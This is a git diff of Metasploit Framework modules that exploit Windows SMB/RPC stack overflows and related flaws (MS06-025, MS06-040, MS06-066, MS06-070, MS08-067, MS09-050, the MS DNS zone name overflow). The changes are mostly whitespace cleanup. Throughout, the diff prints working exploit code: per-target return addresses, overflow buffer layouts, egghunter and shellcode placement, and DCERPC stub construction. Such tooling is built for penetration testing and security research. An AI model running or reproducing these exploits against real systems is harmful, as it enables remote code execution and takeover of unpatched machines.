+3,30 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft RRAS Service Overflow', 'Description' => %q{ - This module exploits a stack overflow in the Windows Routing and Remote - Access Service. Since the service is hosted inside svchost.exe, a failed + This module exploits a stack overflow in the Windows Routing and Remote + Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid - username and password is required to exploit this flaw on Windows 2000. + username and password is required to exploit this flaw on Windows 2000. When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'. }, - 'Author' => + 'Author' => [ 'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>', 'hdm' @@ -41,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2006-2370' ], [ 'OSVDB', '26437' ], [ 'BID', '18325' ], - [ 'MSB', 'MS06-025' ] + [ 'MSB', 'MS06-025' ] ], 'DefaultOptions' => { @@ -55,47 +52,46 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 SP4', { 'Ret' => 0x7571c1e4 } ], [ 'Windows XP SP1', { 'Ret' => 0x7248d4cc } ], ], 'DisclosureDate' => 'Jun 13 2006')) - + register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']), ], self.class) - end # Post authentication bugs are rarely useful during automation def autofilter false end - - def exploit - + + def exploit + connect() smb_login() handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]) - + print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") print_status('Getting OS...') - + # Check the remote OS name and version os = smb_peer_os pat = '' - + case os when /Windows 5\.0/ - pat = + pat = payload.encoded + "\xeb\x06" + rand_text_alphanumeric(2) + @@ -109,19 +105,19 @@ class Metasploit3 < Msf::Exploit::Remote rand_text_alphanumeric(2) + [target.ret].pack('V') + payload.encoded - os = 'Windows XP' + os = 'Windows XP' end - + req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000-pat.length) len = req.length - stb = + stb = NDR.long(0x20000) + NDR.long(len) + - req + + req + NDR.long(len) print_status("Calling the vulnerable function on #{os}...") - + begin dcerpc.call(0x0C, stb) rescue Rex::Proto::DCERPC::Exceptions::NoResponse diff --git a/modules/exploits/windows/smb/ms06_040_netapi.rb b/modules/exploits/windows/smb/ms06_040_netapi.rb index 98d05011ec..c87791cf8b 100644 --- a/modules/exploits/windows/smb/ms06_040_netapi.rb +++ b/modules/exploits/windows/smb/ms06_040_netapi.rb @@ -3,36 +3,33 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft Server Service NetpwPathCanonicalize Overflow', 'Description' => %q{ - This module exploits a stack overflow in the NetApi32 CanonicalizePathName() function + This module exploits a stack overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt - will likely result in a complete reboot on Windows 2000 and the termination of all + will likely result in a complete reboot on Windows 2000 and the termination of all SMB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0. }, - 'Author' => + 'Author' => [ 'hdm' ], @@ -53,26 +50,26 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { # Technically we can use more space than this, but by limiting it - # to 370 bytes we can use the same request for all Windows SPs. + # to 370 bytes we can use the same request for all Windows SPs. 'Space' => 370, 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'DefaultTarget' => 0, - 'Targets' => + 'Targets' => [ [ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ], - [ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', + [ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', { 'Offset' => 1000, - 'Ret' => 0x00020804 - } + 'Ret' => 0x00020804 + } ], [ '(wcscpy) Windows XP SP0/SP1', { - 'Offset' => 612, - 'Ret' => 0x00020804 + 'Offset' => 612, + 'Ret' => 0x00020804 } ], [ '(stack) Windows XP SP1 English', @@ -103,11 +100,11 @@ class Metasploit3 < Msf::Exploit::Remote [ OptString.new('SMBPIPE', [ true, "The pipe name to use (BROWSER, SRVSVC)", 'BROWSER']), ], self.class) - + end - def exploit - + def exploit + connect() smb_login() @@ -116,11 +113,11 @@ class Metasploit3 < Msf::Exploit::Remote when 'Windows 5.0' print_status("Detected a Windows 2000 target") target = targets[1] - + when 'Windows NT 4.0' print_status("Detected a Windows NT 4.0 target") target = targets[1] - + when 'Windows 5.1' begin smb_create("\\SRVSVC") @@ -133,25 +130,25 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Detected a Windows XP target (unknown patch level)") end target = targets[2] - + when /Windows Server 2003 (\d+)$/ print_status("Detected a Windows 2003 SP0 target") target = targets[5] - + when /Windows Server 2003 (\d+) Service Pack (\d+)/ print_status("Windows 2003 SP#{$2} is not exploitable") return - + when /Samba/ print_status("Samba is not vulnerable") return - + else print_status("No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...") return end end - + # Specific fixups for Windows NT case smb_peer_os() when 'Windows NT 4.0' @@ -159,12 +156,12 @@ class Metasploit3 < Msf::Exploit::Remote datastore['SMB::pipe_write_min_size'] = 2048 datastore['SMB::pipe_write_max_size'] = 4096 end - + handle = dcerpc_handle( - '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', + '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"] ) - + print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") @@ -182,81 +179,63 @@ class Metasploit3 < Msf::Exploit::Remote # ); # - print_status("Building the stub data...") + print_status("Building the stub data...") stub = '' case target.name # This covers NT 4.0 as well when /wcscpy.*Windows 2000/ - + code = make_nops(target['Offset'] - payload.encoded.length) + payload.encoded - + path = code + ( [target.ret].pack('V') * 16 ) + "\x00\x00" - stub = + stub = NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingStringPreBuilt(path) + NDR.long(rand(250)+1) + NDR.UnicodeConformantVaryingStringPreBuilt("\xeb\x02\x00\x00") + NDR.long(rand(250)+1) + - NDR.long(0) - - when /wcscpy.*Windows XP/ + NDR.long(0) + + when /wcscpy.*Windows XP/ path = # Payload goes first payload.encoded + - + # Padding rand_text_alphanumeric(target['Offset'] - payload.encoded.length) + - + # Land 6 bytes in to bypass garbage (XP SP0) [ target.ret + 6 ].pack('V') + - + # Padding rand_text_alphanumeric(8) + - + # Address to write our shellcode (XP SP0) [ target.ret ].pack('V') + - + # Padding rand_text_alphanumeric(32) + # Jump straight to shellcode (XP SP1) [ target.ret ].pack('V') + - + # Padding - rand_text_alphanumeric(8) + - + rand_text_alphanumeric(8) + + # Address to write our shellcode (XP SP1) [ target.ret ].pack('V') + - + # Padding rand_text_alphanumeric(32) + - + # Terminate the path "\x00\x00" - - stub = - NDR.long(rand(0xffffffff)) + - NDR.UnicodeConformantVaryingString('') + - NDR.UnicodeConformantVaryingStringPreBuilt(path) + - NDR.long(rand(0xf0)+1) + - NDR.UnicodeConformantVaryingString('') + - NDR.long(rand(0xf0)+1) + - NDR.long(0) - - - when /stack/ - buff = rand_text_alphanumeric(800) - buff[0, payload.encoded.length] = payload.encoded - buff[ target['OffsetA'], 4 ] = [target.ret].pack('V') - buff[ target['OffsetB'], 5 ] = "\xe9" + [ (target['OffsetA'] + 5) * -1 ].pack('V') - - path = "\\\x00\\\x00" + buff + "\x00\x00" - - stub = + + stub = NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingStringPreBuilt(path) + @@ -264,8 +243,26 @@ class Metasploit3 < Msf::Exploit::Remote NDR.UnicodeConformantVaryingString('') + NDR.long(rand(0xf0)+1) + NDR.long(0) - - + + + when /stack/ + buff = rand_text_alphanumeric(800) + buff[0, payload.encoded.length] = payload.encoded + buff[ target['OffsetA'], 4 ] = [target.ret].pack('V') + buff[ target['OffsetB'], 5 ] = "\xe9" + [ (target['OffsetA'] + 5) * -1 ].pack('V') + + path = "\\\x00\\\x00" + buff + "\x00\x00" + + stub = + NDR.long(rand(0xffffffff)) + + NDR.UnicodeConformantVaryingString('') + + NDR.UnicodeConformantVaryingStringPreBuilt(path) + + NDR.long(rand(0xf0)+1) + + NDR.UnicodeConformantVaryingString('') + + NDR.long(rand(0xf0)+1) + + NDR.long(0) + + when /wcscpy.*Windows 2003/ path = # Payload goes first @@ -309,9 +306,9 @@ class Metasploit3 < Msf::Exploit::Remote NDR.long(0) end - + print_status("Calling the vulnerable function...") - + begin dcerpc.call(0x1f, stub) dcerpc.call(0x1f, stub) diff --git a/modules/exploits/windows/smb/ms06_066_nwapi.rb b/modules/exploits/windows/smb/ms06_066_nwapi.rb index 2f1851d7dd..2ecc4493fc 100644 --- a/modules/exploits/windows/smb/ms06_066_nwapi.rb +++ b/modules/exploits/windows/smb/ms06_066_nwapi.rb @@ -3,30 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking - + include Msf::Exploit::Remote::Egghunter include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft Services MS06-066 nwapi32.dll', 'Description' => %q{ - This module exploits a stack overflow in the svchost service, when the netware - client service is running. This specific vulnerability is in the nwapi32.dll module. + This module exploits a stack overflow in the svchost service, when the netware + client service is running. This specific vulnerability is in the nwapi32.dll module. }, 'Author' => [ 'pusscat' ], 'License' => MSF_LICENSE, @@ -48,31 +46,29 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 296, 'BadChars' => "", - 'Compat' => + 'Compat' => { # -ws2ord XXX? }, 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ + [ 'Windows XP SP2', { 'Ret' => 0x00EBEEEC , }, ] ], - 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 14 2006')) - + register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'srvsvc']), ], self.class) - end def exploit @@ -84,34 +80,31 @@ class Metasploit3 < Msf::Exploit::Remote # Generate the egghunter payload hunter = generate_egghunter() egg = hunter[1] - #print_status("Today, we'll be hunting for 0x#{egg.unpack("V")[0]}") + #print_status("Today, we'll be hunting for 0x#{egg.unpack("V")[0]}") - # Add giant blocks of guard data before and after the egg - eggdata = + # Add giant blocks of guard data before and after the egg + eggdata = rand_text(1024) + - egg + - egg + - payload.encoded + + egg + + egg + + payload.encoded + rand_text(1024) buflen = 295 ofstring = Rex::Text.to_unicode('\\\\') + "\x90" + hunter[0] + rand_text(buflen-hunter[0].length) + - [ target.ret ].pack('V') + "\x00" + [ target.ret ].pack('V') + "\x00" #ofstring = Rex::Text.to_unicode('\\\\') + payload.encoded + [ target.ret ].pack('V') + "\x00\x00" - stubdata = - NDR.long(rand(0xffffffff)) + - NDR.UnicodeConformantVaryingString("\\\\BBBB") + - NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) + # HERE! - #NDR.UnicodeConformantVaryingString('\\\\' + "A"*1024 + "\x00") + - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + - #NDR.long((ofstring.length * 2) + 0xC) + - eggdata - - - - + stubdata = + NDR.long(rand(0xffffffff)) + + NDR.UnicodeConformantVaryingString("\\\\BBBB") + + NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) + # HERE! + #NDR.UnicodeConformantVaryingString('\\\\' + "A"*1024 + "\x00") + + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) + + #NDR.long((ofstring.length * 2) + 0xC) + + eggdata + print_status("Connecting to the SMB service...") connect() smb_login() @@ -122,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Bound to #{handle} ...") print_status("Calling the vulnerable function...") - + begin dcerpc.call(0x09, stubdata) rescue Rex::Proto::DCERPC::Exceptions::NoResponse @@ -133,21 +126,21 @@ class Metasploit3 < Msf::Exploit::Remote else raise e end - else + else print_status("Got #{dcerpc.last_response.stub_data.length} bytes: #{dcerpc.last_response.stub_data}") end # Cleanup handler - disconnect - - if (dcerpc.last_response != nil and - dcerpc.last_response.stub_data != nil and + disconnect + + if (dcerpc.last_response != nil and + dcerpc.last_response.stub_data != nil and dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00") return true - else + else return false end end - + end diff --git a/modules/exploits/windows/smb/ms06_066_nwwks.rb b/modules/exploits/windows/smb/ms06_066_nwwks.rb index 5dc0c5135f..109e18518f 100644 --- a/modules/exploits/windows/smb/ms06_066_nwwks.rb +++ b/modules/exploits/windows/smb/ms06_066_nwwks.rb @@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft Services MS06-066 nwwks.dll', 'Description' => %q{ - This module exploits a stack overflow in the svchost service, when the netware + This module exploits a stack overflow in the svchost service, when the netware client service is running. This specific vulnerability is in the nwapi32.dll module. }, 'Author' => [ 'pusscat' ], @@ -47,17 +45,17 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 1000, 'BadChars' => "", - 'Compat' => + 'Compat' => { # -ws2ord XXX? }, 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ - 'Windows XP SP2', + [ + 'Windows XP SP2', { 'Ret' => 0x616566fb, # modemui.dll [esp + 16]: popaw, ret }, @@ -66,35 +64,31 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 14 2006')) - + register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'nwwks']), ], self.class) - + end def exploit # [in] [unique] wchar * # [in] [unique] wchar * # [out] long - - ofstring = Rex::Text.to_unicode('\\\\') + rand_text(292) + [ target.ret ].pack('V') + "\x00\x00" - stubdata = - NDR.long(rand(0xffffffff)) + - NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") + - NDR.long(rand(0xffffffff)) + - NDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + "\x00\x00") + - NDR.long(rand(0xffffffff)) + - NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") + - NDR.long(rand(0xffffffff)) + - NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") + - NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) - - - - + ofstring = Rex::Text.to_unicode('\\\\') + rand_text(292) + [ target.ret ].pack('V') + "\x00\x00" + stubdata = + NDR.long(rand(0xffffffff)) + + NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") + + NDR.long(rand(0xffffffff)) + + NDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + "\x00\x00") + + NDR.long(rand(0xffffffff)) + + NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") + + NDR.long(rand(0xffffffff)) + + NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") + + NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) + print_status("Connecting to the SMB service...") connect() smb_login() @@ -105,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Bound to #{handle} ...") print_status("Calling the vulnerable function...") - + begin dcerpc.call(0x01, stubdata) rescue Rex::Proto::DCERPC::Exceptions::NoResponse @@ -116,21 +110,21 @@ class Metasploit3 < Msf::Exploit::Remote else raise e end - else + else print_status("Got #{dcerpc.last_response.stub_data.length} bytes: #{dcerpc.last_response.stub_data}") end # Cleanup handler - disconnect - - if (dcerpc.last_response != nil and - dcerpc.last_response.stub_data != nil and + disconnect + + if (dcerpc.last_response != nil and + dcerpc.last_response.stub_data != nil and dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00") return true - else + else return false end end - + end diff --git a/modules/exploits/windows/smb/ms06_070_wkssvc.rb b/modules/exploits/windows/smb/ms06_070_wkssvc.rb index 03031ccb1c..02c448ed46 100644 --- a/modules/exploits/windows/smb/ms06_070_wkssvc.rb +++ b/modules/exploits/windows/smb/ms06_070_wkssvc.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -20,21 +18,20 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::SMB include Msf::Exploit::Seh - def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Workstation Service NetpManageIPCConnect Overflow', 'Description' => %q{ - This module exploits a stack overflow in the NetApi32 NetpManageIPCConnect + This module exploits a stack overflow in the NetApi32 NetpManageIPCConnect function using the Workstation service in Windows 2000 SP4 and Windows XP SP2. - - In order to exploit this vulnerability, you must specify a the name of a + + In order to exploit this vulnerability, you must specify a the name of a valid Windows DOMAIN. It may be possible to satisfy this condition by using a custom dns and ldap setup, however that method is not covered here. - - Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator + + Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator credentials are required to reach the vulnerable code. Windows XP SP1 only - requires valid user credentials. Also, testing shows that a machine already + requires valid user credentials. Also, testing shows that a machine already joined to a domain is not exploitable. }, 'Author' => @@ -87,7 +84,6 @@ class Metasploit3 < Msf::Exploit::Remote # NOTE: a valid domain name is required. See description. OptString.new('DOMAIN', [ true, "The domain to validate prior to joining it."]) ], self.class) - end def exploit @@ -174,13 +170,13 @@ end The IDL for NetrJoinDomain2 looks like this: long _NetrJoinDomain2@28 ( - [in][unique][string] wchar_t * arg_1, - [in][string] wchar_t * arg_2, - [in][unique][string] wchar_t * arg_3, - [in][unique][string] wchar_t * arg_4, - [in][unique] struct_C * arg_5, - [in] long arg_6 - ); + [in][unique][string] wchar_t * arg_1, + [in][string] wchar_t * arg_2, + [in][unique][string] wchar_t * arg_3, + [in][unique][string] wchar_t * arg_4, + [in][unique] struct_C * arg_5, + [in] long arg_6 + ); 1. --> dns server - query for IN.SRV _ldap._tcp.dc._msdcs.DOMAIN diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index ffc1befeb2..38dd3bc58a 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Microsoft Server Service Relative Path Stack Corruption', 'Description' => %q{ - This module exploits a parsing flaw in the path canonicalization code of + This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same diff --git a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb index 830026546c..6b401a5cc4 100644 --- a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb +++ b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb @@ -3,36 +3,34 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::SMB include Msf::Exploit::KernelMode - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference', 'Description' => %q{ - This module exploits an out of bounds function table dereference in the SMB - request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 - release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista - without SP1 does not seem affected by this flaw. + This module exploits an out of bounds function table dereference in the SMB + request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 + release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista + without SP1 does not seem affected by this flaw. }, 'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm', 'sf' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'MSB', 'MS09-050' ], [ 'CVE', '2009-3103' ], @@ -52,14 +50,14 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, 'DisableNops' => true, 'EncoderType' => Msf::Encoder::Type::Raw, - 'ExtendedOptions' => + 'ExtendedOptions' => { 'Stager' => 'stager_sysenter_hook', } }, 'Platform' => 'win', 'Targets' => - [ + [ [ 'Windows Vista SP1/SP2 and Server 2008 (x86)', { 'Platform' => 'win', @@ -74,7 +72,11 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0 )) - register_options( [ Opt::RPORT(445), OptInt.new( 'WAIT', [ true, "The number of seconds to wait for the attack to complete.", 180 ] ) ], self.class ) + register_options( + [ + Opt::RPORT(445), + OptInt.new( 'WAIT', [ true, "The number of seconds to wait for the attack to complete.", 180 ] ) + ], self.class) end # Not reliable enough for automation yet @@ -86,20 +88,20 @@ class Metasploit3 < Msf::Exploit::Remote print_status( "Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})..." ) connect - # we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest + # we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest # and srv2!SrvProcPartialCompleteCompoundedRequest dialects = [ [ target['ReadAddress'] ].pack("V") * 25, "SMB 2.002" ] - + data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('') data += [ 0x00000000 ].pack("V") * 37 # Must be NULL's data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b) - data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34 + data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34 data += [ 0x42424242 ].pack("V") * 7 # Unused data += [ target['MagicIndex'] ].pack("V") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E) data += [ 0x41414141 ].pack("V") * 6 # Unused data += [ target.ret ].pack("V") # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2 data += payload.encoded # Our ring0 -> ring3 shellcode - + # We gain code execution by returning into the SMB packet, begining with its header. # The SMB packets Magic Header value is 0xFF534D42 which assembles to "CALL DWORD PTR [EBX+0x4D]; INC EDX" # This will cause an access violation if executed as we can never set EBX to a valid pointer. @@ -115,9 +117,9 @@ class Metasploit3 < Msf::Exploit::Remote packet['Payload']['SMB'].v['Signature2'] = 0x00000000 # ... packet['Payload']['SMB'].v['MultiplexID'] = rand( 0x10000 ) packet['Payload'].v['Payload'] = data - + packet = packet.to_s - + print_status( "Sending the exploit packet (#{packet.length} bytes)..." ) sock.put( packet ) @@ -134,14 +136,14 @@ class Metasploit3 < Msf::Exploit::Remote sec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1)) rescue ::Exception => e sec.socket.close - end + end end while( stime + wtime > Time.now.to_i ) select(nil, nil, nil, 0.25) break if session_created? end - + handler disconnect end diff --git a/modules/exploits/windows/smb/msdns_zonename.rb b/modules/exploits/windows/smb/msdns_zonename.rb index a34a89c645..f2c3651124 100644 --- a/modules/exploits/windows/smb/msdns_zonename.rb +++ b/modules/exploits/windows/smb/msdns_zonename.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -20,21 +18,20 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::SMB def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)', 'Description' => %q{ - This module exploits a stack overflow in the RPC interface - of the Microsoft DNS service. The vulnerability is triggered - when a long zone name parameter is supplied that contains - escaped octal strings. This module is capable of bypassing NX/DEP - protection on Windows 2003 SP1/SP2. This module exploits the - RPC service using the \\DNSSERVER pipe available via SMB. This - pipe requires a valid user account to access, so the SMBUSER - and SMBPASS options must be specified. - + This module exploits a stack overflow in the RPC interface + of the Microsoft DNS service. The vulnerability is triggered + when a long zone name parameter is supplied that contains + escaped octal strings. This module is capable of bypassing NX/DEP + protection on Windows 2003 SP1/SP2. This module exploits the + RPC service using the \\DNSSERVER pipe available via SMB. This + pipe requires a valid user account to access, so the SMBUSER + and SMBPASS options must be specified. }, - 'Author' => - [ + 'Author' => + [ 'hdm', # initial module 'anonymous' # 2 anonymous contributors (2003 support) ], @@ -51,19 +48,19 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread' - }, + }, 'Payload' => { 'Space' => 500, - + # The payload doesn't matter, but make_nops() uses these too 'BadChars' => "\x00", - + 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ], @@ -76,18 +73,18 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ], [ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ], - + # ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll) [ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ], [ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ], - [ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ], + [ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ], [ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ], [ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ], - + ], 'DisclosureDate' => 'Apr 12 2007', 'DefaultTarget' => 0 )) - + register_options( [ OptString.new('Locale', [ true, "Locale for automatic target (English, French, Italian, ...)", 'English']) @@ -101,12 +98,12 @@ class Metasploit3 < Msf::Exploit::Remote if ((target['OS'] =~ /#{os}/) && (target.name =~ /#{datastore['Locale']}/)) return target end - end - + end + return nil end - + def exploit connect() @@ -120,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote target = nil when 'Windows 5.0' - print_status("Detected a Windows 2000 SP0-SP4 target...") + print_status("Detected a Windows 2000 SP0-SP4 target...") target = gettarget('2000') when 'Windows 5.1' @@ -128,11 +125,11 @@ class Metasploit3 < Msf::Exploit::Remote target = nil when /Windows Server 2003 (\d+)$/ - print_status("Detected a Windows 2003 SP0 target...") + print_status("Detected a Windows 2003 SP0 target...") target = gettarget('2003SP0') when /Windows Server 2003 (\d+) Service Pack (\d+)/ - print_status("Detected a Windows 2003 SP#{$2} target...") + print_status("Detected a Windows 2003 SP#{$2} target...") target = gettarget('2003SP12') else print_status("Unknown OS: #{smb_peer_os}") @@ -143,10 +140,10 @@ class Metasploit3 < Msf::Exploit::Remote if (not target) print_status("There is no available target for this OS locale") return - end - + end + print_status("Trying target #{target.name}...") - + # Bind to the service handle = 